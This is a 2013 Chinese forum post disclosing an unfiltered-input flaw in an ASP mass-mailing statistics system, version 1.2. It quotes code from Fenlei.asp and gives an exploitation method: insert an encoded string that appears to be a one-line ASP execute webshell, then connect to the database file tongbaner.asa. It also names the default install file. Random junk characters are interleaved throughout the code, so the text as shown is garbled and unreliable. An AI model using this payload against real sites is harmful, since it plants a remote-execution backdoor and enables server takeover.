找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1848|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp 5 g, I5 Z) t2 q. O) z$ H) I

! H6 W+ q- A, r1 y! I& T/ sIF Request.QueryString("Action")="del" Then ( a: K* N% i6 s' `' o( @
ID=Request.QueryString("ID")
6 \4 `! H+ e  cIF Countss ("tui","Fenlei",ID )<>0 then 4 I, B8 _! P( v' I- Y
'略 . m7 w, q" g$ b% D! j
IF Request.QueryString("Action")="Add" Then & ~5 r0 e7 e# U; h
Tname=Request.Form("Typename") 2 C: r& p* A: _% \" X  t
Set Rs=Server.CreateObject("adodb.Recordset")
3 G0 K# R4 z* W& Q4 k% T+ j2 z( eSql="Select * From Fenlei Order by id Desc " ) K5 i6 b, g: f! H) b
Rs.Open Sql,Conn,1,3
; i/ Z' h3 L) W$ iRs.Addnew
, ^% W: a) `: i8 Z* wRs("Typename")=Tname 9 v: R$ G! S/ \- t7 R
'略
1 K6 t. q, p; o! c6 ^6 z" kSet Rs=Server.CreateObject("adodb.Recordset")
8 ^0 U: j  H! N. u& D6 {6 W; O3 ^Sql="Select * From Fenlei Order by id Desc " 4 H$ E; [6 z3 p& e4 Q
Rs.Open Sql,Conn,1,1
( e8 v" T* N% D1 r'略
3 Z1 k* F4 i* m  ~9 K%>% e0 x" Z+ _3 c/ ?# {: y+ a6 H
! \( Z; E) F2 G9 }9 q- f5 o
; S3 X. F) h2 `% e, {
. B: X( C- A7 ~# h" c& @
没有过滤,直接写入数据库。. x+ s! r( V  r* T5 R7 z

% W! ^% f5 Z; L% |利用方法:
+ z0 ~1 W! ~5 Z- \8 @ : i& e- M' z1 }
插入:┼攠數畣整爠煥敵瑳∨≡┩>
" J* w% q% h4 }8 d" f* b% Z 7 @6 G: t$ I9 L' A0 @  A

- b5 ?, Z9 R0 {! t8 B3 N连接: http://www.xxx.com/###tongbaner.asa # n0 d* t$ U% k9 N
'默认安装文件: 4 S5 z$ N/ x5 q' H) O: K  t& D
'install.asp
' G! E: K3 o8 {2 D; n' o
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表